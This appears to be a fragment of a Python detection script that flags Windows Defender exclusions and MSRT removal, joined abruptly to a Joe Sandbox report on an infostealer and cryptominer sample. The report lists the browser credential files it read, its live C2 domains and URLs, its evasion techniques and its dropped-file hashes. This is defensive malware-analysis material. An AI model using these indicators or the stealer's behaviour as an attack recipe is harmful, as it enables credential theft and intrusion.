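        r"\badd-mppreference\b.*-exclusion(path|process|extension)\b", re.I),
    # KB890830 is the Malicious Software Removal Tool.
    "msrt_removed": re.compile(r"\bwusa(\.exe)?\b.*/uninstall\b.*/kb:890830\b", re.I),
}

ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
QUOTED_RE = re.compile(r"'([^']+)'")


def normalize_cmdline(cmdline):
    """Append the decoded -EncodedCommand payload (if any) so rules see it."""
    m = ENC_RE.search(cmdline)
    if m:
        try:
            cmdline += " " + base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass  # not a real payload; match on the raw line only
    return cmdline


def evaluate(events):
    """Return one hit per (event, rule) match, with exclusion paths extracted."""
    hits = []
    for ev in events:
        cmdline = normalize_cmdline(ev["cmdline"])
        for name, rx in RULES.items():
            if not rx.search(cmdline):
                continue
            hit = {"rule": name, "pid": ev["pid"], "parent": ev["parent_image"]}
            if name == "defender_exclusion_added":
                hit["exclusions"] = QUOTED_RE.findall(cmdline)
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in evaluate(EVENTS):
        print(h)
```

The parent image is carried on every hit on purpose: powercfg launched by a binary under C:\ProgramData, as in this report, is far stronger than powercfg on its own, which administrators run legitimately. The extracted exclusion paths are the response artefact, since they tell you exactly which directories Defender has stopped scanning and therefore where to look for the dropped payloads.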

                        Stealing of Sensitive Information

                        Source: Yara match  File source: file.exe, type: SAMPLE
                        Source: Yara match  File source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match  File source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match  File source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match  File source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match  File source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match  File source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match  File source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match  File source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match  File source: Process Memory Space: file.exe PID: 4152, type: MEMORYSTR
                        Source: Yara match  File source: Process Memory Space: explorer.exe PID: 5020, type: MEMORYSTR
                        Source: C:\Windows\explorer.exe  Code function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data 33_2_013940D0
                        Source: C:\Windows\explorer.exe  Code function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data 35_2_027B40D0
                        Source: C:\Windows\explorer.exe  Code function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data 36_2_029F40D0
                        Source: C:\Windows\explorer.exe  Code function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword 33_2_0139AF00
                        Source: C:\Windows\explorer.exe  Code function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword 35_2_027BAF00
                        Source: C:\Windows\explorer.exe  Code function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword 36_2_029FAF00
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\pkcs11.txt
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Windows\explorer.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                        Remote Access Functionality

Source: Yara match; File source: file.exe, type: SAMPLE
Source: Yara match; File source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 4152, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: explorer.exe PID: 5020, type: MEMORYSTR
MITRE ATT&CK Matrix (grouped by tactic; a number before a technique is the count shown in the report for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Windows Management Instrumentation; 22 Native API; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 1 Service Execution; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 11 Windows Service; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 11 Windows Service; 612 Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion; 1 Modify Registry; 131 Virtualization/Sandbox Evasion; 612 Process Injection; HTML Smuggling
Credential Access: 2 OS Credential Dumping; 21 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 11 Account Discovery; 2 File and Directory Discovery; 126 System Information Discovery; 351 Security Software Discovery; 131 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 21 Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1570971; Sample: file.exe; Start date: 08/12/2024; Architecture: WINDOWS; Score: 100)

Start: contacted domains woo097878781.win, pool.hashvault.pro; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
• file.exe (started): Found evasive API chain (may stop execution after checking mutex); Contains functionality to inject code into remote processes; Adds a directory exclusion to Windows Defender; 4 other signatures
  • explorer.exe (started): connects to woo097878781.win 154.216.20.243 port 443 (local ports 49707, 49708; SKHT-ASShenzhenKatherineHengTechnologyInformationCo, Seychelles) and to 185.157.162.216 (local ports 49709, 49711, 49714; OBE-EUROPEObenetworkEuropeSE, Sweden); drops C:\ProgramData\...\WindosCPUsystem.exe (PE32+); signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Found evasive API chain (may stop execution after checking mutex); 5 other signatures
    • WindosCPUsystem.exe (started): drops C:\Users\user\AppData\...\ggbfqxmgkimt.sys (PE32+); signatures: Protects its processes via BreakOnTermination flag; Injects code into the Windows Explorer (explorer.exe); Uses powercfg.exe to modify the power settings; 4 other signatures
      • explorer.exe (started): connects to 37.203.243.102 port 3333 (local port 49773; DAPLDATAPLANETLtdRU, Russian Federation); signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      • powershell.exe (started): Loading BitLocker PowerShell Module
        • conhost.exe (started)
      • cmd.exe (started)
        • conhost.exe (started)
        • wusa.exe (started)
      • 9 other processes
        • conhost.exe (started); conhost.exe (started); conhost.exe (started); 6 other processes
    • explorer.exe (started): System process connects to network (likely due to code injection or exploit)
    • explorer.exe (started): Tries to harvest and steal browser information (history, passwords, etc)
    • explorer.exe (started)
  • cmd.exe (started): Adds a directory exclusion to Windows Defender
    • powershell.exe (started): Loading BitLocker PowerShell Module
    • conhost.exe (started)

Antivirus detection (Source; Detection; Scanner)
• file.exe; 100%; Joe Sandbox ML
• C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys; 5%; ReversingLabs
No Antivirus matches (dropped files)
No Antivirus matches (unpacked PE files)
Contacted domains (Name; IP; Active; Malicious; Antivirus Detection; Reputation)
• pool.hashvault.pro; 5.188.137.200; active: true; malicious: false; antivirus detection: none; reputation: high
• woo097878781.win; 154.216.20.243; active: true; malicious: true; antivirus detection: none; reputation: unknown

Contacted URLs (Name; Malicious; Antivirus Detection; Reputation)
• https://woo097878781.win/WindosCPUsystem.exe; malicious: true; Avira URL Cloud: safe; reputation: unknown
• https://woo097878781.win/66/api/endpoint.php; malicious: true; Avira URL Cloud: safe; reputation: unknown
• https://woo097878781.win/upload.php; malicious: true; Avira URL Cloud: safe; reputation: unknown
• https://woo097878781.win/64.EXE; malicious: true; Avira URL Cloud: safe; reputation: unknown
Contacted IPs (IP; Domain; Country; ASN; ASN Name; Malicious)
• 37.203.243.102; domain: unknown; Russian Federation; ASN 44964; DAPLDATAPLANETLtdRU; malicious: true
• 185.157.162.216; domain: unknown; Sweden; ASN 197595; OBE-EUROPEObenetworkEuropeSE; malicious: true
• 154.216.20.243; domain: woo097878781.win; Seychelles; ASN 135357; SKHT-ASShenzhenKatherineHengTechnologyInformationCo; malicious: true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1570971
                                            Start date and time:2024-12-08 15:06:08 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 10m 19s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:37
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:file.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.mine.winEXE@53/12@2/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 91
                                            • Number of non-executed functions: 288
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: file.exe
Time | Type | Description
--- | --- | ---
09:07:02 | API Interceptor | 29x Sleep call for process: powershell.exe modified
09:07:28 | API Interceptor | 1x Sleep call for process: WindosCPUsystem.exe modified
09:07:32 | API Interceptor | 327x Sleep call for process: explorer.exe modified
15:07:01 | Task Scheduler | Run new task: WindowsServer2024 path: "C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe" s>{741330C7-73F4-49B6-9258-6679317DED46}
Match | Associated Sample Name / URL | Detection | Threat Name
--- | --- | --- | ---
37.203.243.102 | lokigod.exe | malicious | Xmrig
 | xblkpfZ8Y4.exe | malicious | Xmrig
154.216.20.243 | https://zillow-online.com/realestate/one/drive/docs/ | malicious | HTMLPhisher
 | https://zillow-online.com/realestate/one/drive/docs/ | malicious | HTMLPhisher
 | https://estacionar-replonline.net/galicia/?fbclid=PAZXh0bgNhZW0BMAABpj | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
pool.hashvault.pro | lokigod.exe | malicious | Xmrig | 37.203.243.102
 | xblkpfZ8Y4.exe | malicious | Xmrig | 5.188.137.200
 | 0kToM9fVGQ.exe | malicious | Xmrig | 45.76.89.70
 | prog.exe | malicious | Xmrig | 95.179.241.203
 | bypass.exe | malicious | Xmrig | 95.179.241.203
 | loader.exe | malicious | Xmrig | 142.202.242.43
 | 7K5DrSyL8Y.exe | malicious | Xmrig | 45.76.89.70
 | eshkere.bat | malicious | Xmrig | 95.179.241.203
 | frik.exe | malicious | Xmrig | 95.179.241.203
 | Google Chrome.exe | malicious | Xmrig | 45.76.89.70
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
DAPL DATAPLANET Ltd RU | lokigod.exe | malicious | Xmrig | 37.203.243.102
 | xblkpfZ8Y4.exe | malicious | Xmrig | 37.203.243.102
 | v859oajfVH.elf | malicious | Unknown | 37.203.242.178
 | oAUrOBvfbV.elf | malicious | Mirai | 93.188.42.246
 | x86_64-20220704-2102 | malicious | Mirai | 93.188.42.210
 | 9faoC0drSo | malicious | Mirai | 93.188.42.249
 | arm | malicious | Mirai | 93.188.42.224
 | eqqFDsQ1Jq | malicious | Mirai | 93.188.42.241
 | QeykTlqE4S | malicious | Mirai | 93.188.42.232
OBE-EUROPE Obenetwork Europe SE | secondaryTask.vbs | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.157.162.126
 | Slf.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.157.162.126
 | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.157.162.126
 | la.bot.arm6.elf | malicious | Unknown | 193.183.116.8
 | LauncherPred8.3.37Stablesetup.msi | malicious | Remcos | 185.157.162.126
 | Slf.msi | malicious | Remcos | 185.157.162.126
 | HSG-IVN-2093456FIN.exe | malicious | Remcos | 185.157.163.135
 | Payload 94.75.225.exe | malicious | Unknown | 45.148.17.56
 | nabarm5.elf | malicious | Unknown | 185.242.230.228
 | ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 193.187.91.212
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 154.216.20.243
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 154.216.20.243
 | file.exe | malicious | Amadey, Stealc, Vidar | 154.216.20.243
 | file.exe | malicious | LummaC Stealer | 154.216.20.243
 | file.exe | malicious | LummaC Stealer | 154.216.20.243
 | file.exe | malicious | LummaC Stealer | 154.216.20.243
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 154.216.20.243
 | List of required items pdf.vbs | malicious | GuLoader | 154.216.20.243
 | List of required items.vbs | malicious | Unknown | 154.216.20.243
 | List of required items and services pdf.vbs | malicious | GuLoader | 154.216.20.243
Match | Associated Sample Name / URL | Detection | Threat Name
--- | --- | --- | ---
C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys | nlGOh9K5X5.exe | malicious | Xmrig
 | LfHJdrALlh.exe | malicious | Xmrig
 | iKvzvknzW1.exe | malicious | Xmrig
 | 2zirzlMVqX.bat | malicious | Xmrig
 | DM6vAAgoCw.exe | malicious | Orcus, Xmrig
 | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig
 | luQ2wBh8q6.exe | malicious | Xmrig
 | lokigod.exe | malicious | Xmrig
 | nfkciRoR4j.exe | malicious | Xmrig
 | File.exe | malicious | Orcus, Xmrig
                                                                          Process:C:\Windows\explorer.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2590208
                                                                          Entropy (8bit):6.512800129699833
                                                                          Encrypted:false
                                                                          SSDEEP:49152:fRyZU39fpyOe2piBq3hujaLdGvVKzbftJOKXaSBAWRrtJeE:1ZpyOx8q3hujOiVKftJOwaSeWRrB
                                                                          MD5:FD863BAB145A20D25E45177DA0E56EFC
                                                                          SHA1:ED8B0421B30B2D3783DD1A4FCDCE6E6860D7F6AD
                                                                          SHA-256:9E96BFA5E3159B7B0BEAA0C8A46A1783C900934AAE56193E26EFF8D4D85777A7
                                                                          SHA-512:9A51E4CF363349DF1E831153C107ED9CAA75E0F6536E622585BC85531C1038A24BE8FBA0EEE0D56DBBDE3D3B116163467C8F8788D89AF801F9C287CA294A6A64
                                                                          Malicious:true
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Tg.........."......z....'.....@..........@..............................'...........`.................................................H...<.............'.t.............'.x...............................(.......8..............P............................text...&x.......z.................. ..`.rdata..L........ ...~..............@..@.data.....&.......&.................@....pdata..t.....'......~'.............@..@.00cfg........'.......'.............@..@.tls..........'.......'.............@....reloc..x.....'.......'.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.34726597513537405
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlll:Nll
                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                          Malicious:false
                                                                          Preview:@...e...........................................................
                                                                          Process:C:\Windows\explorer.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):51200
                                                                          Entropy (8bit):0.8745947603342119
                                                                          Encrypted:false
                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):14544
                                                                          Entropy (8bit):6.2660301556221185
                                                                          Encrypted:false
                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View (other submissions with this file):
• Filename: nlGOh9K5X5.exe, Detection: malicious
• Filename: LfHJdrALlh.exe, Detection: malicious
• Filename: iKvzvknzW1.exe, Detection: malicious
• Filename: 2zirzlMVqX.bat, Detection: malicious
• Filename: DM6vAAgoCw.exe, Detection: malicious
• Filename: f5TWdT5EAc.exe, Detection: malicious
• Filename: luQ2wBh8q6.exe, Detection: malicious
• Filename: lokigod.exe, Detection: malicious
• Filename: nfkciRoR4j.exe, Detection: malicious
• Filename: File.exe, Detection: malicious
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):6.232060473751836
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:file.exe
                                                                          File size:515'584 bytes
                                                                          MD5:05bbeba85b66e05630ab53abe2f0864e
                                                                          SHA1:5181b7d8e9ec8946ad3256b1b400e2f570dae8da
                                                                          SHA256:c2ee598db573b89211027b5607fb6561742991be3b9d5ed9e413a3c3d35da01b
                                                                          SHA512:3cfaacdc097d9d2bc866bf56bdce87647496b53e76415754e7269e611dfc4fe1b94a0674041dbbb24ab4366ae171fb3e1bdb1074b8eaf31f7f625a308c19da75
                                                                          SSDEEP:6144:BRHP4vL3s5+CM6OW0nUBiwCCWfS34mbWMkRONOgbBpiEVBHl8ba2z7OBiL:BRHP63srM6AbCWfS34mSMkrCpPFBC
                                                                          TLSH:20B49F10E6A0C026D0A5507597FAC3379924BE325B0158D7BBE1FF6A1E355F2AE3072B
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9...9...9.......9..U....9.......9.......9...8.K.9..U....9..U....9..U....9..U....9..U....9.Rich..9........................
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x42626c
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6736E596 [Fri Nov 15 06:09:26 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:22619f424fdceb139f88e36aa82b184d
                                                                          Instruction
                                                                          call 00007F73E0DA3183h
                                                                          jmp 00007F73E0D9DF2Eh
                                                                          pxor xmm0, xmm0
                                                                          push ecx
                                                                          push ebx
                                                                          mov eax, ecx
                                                                          and eax, 0Fh
                                                                          test eax, eax
                                                                          jne 00007F73E0D9E121h
                                                                          mov eax, edx
                                                                          and edx, 7Fh
                                                                          shr eax, 07h
                                                                          je 00007F73E0D9E0D9h
                                                                          lea esp, dword ptr [esp+00000000h]
                                                                          movdqa dqword ptr [ecx], xmm0
                                                                          movdqa dqword ptr [ecx+10h], xmm0
                                                                          movdqa dqword ptr [ecx+20h], xmm0
                                                                          movdqa dqword ptr [ecx+30h], xmm0
                                                                          movdqa dqword ptr [ecx+40h], xmm0
                                                                          movdqa dqword ptr [ecx+50h], xmm0
                                                                          movdqa dqword ptr [ecx+60h], xmm0
                                                                          movdqa dqword ptr [ecx+70h], xmm0
                                                                          lea ecx, dword ptr [ecx+00000080h]
                                                                          dec eax
                                                                          jne 00007F73E0D9E072h
                                                                          test edx, edx
                                                                          je 00007F73E0D9E0D9h
                                                                          mov eax, edx
                                                                          shr eax, 04h
                                                                          je 00007F73E0D9E0B1h
                                                                          jmp 00007F73E0D9E0A5h
                                                                          lea ecx, dword ptr [ecx+00h]
                                                                          movdqa dqword ptr [ecx], xmm0
                                                                          lea ecx, dword ptr [ecx+10h]
                                                                          dec eax
                                                                          jne 00007F73E0D9E098h
                                                                          and edx, 0Fh
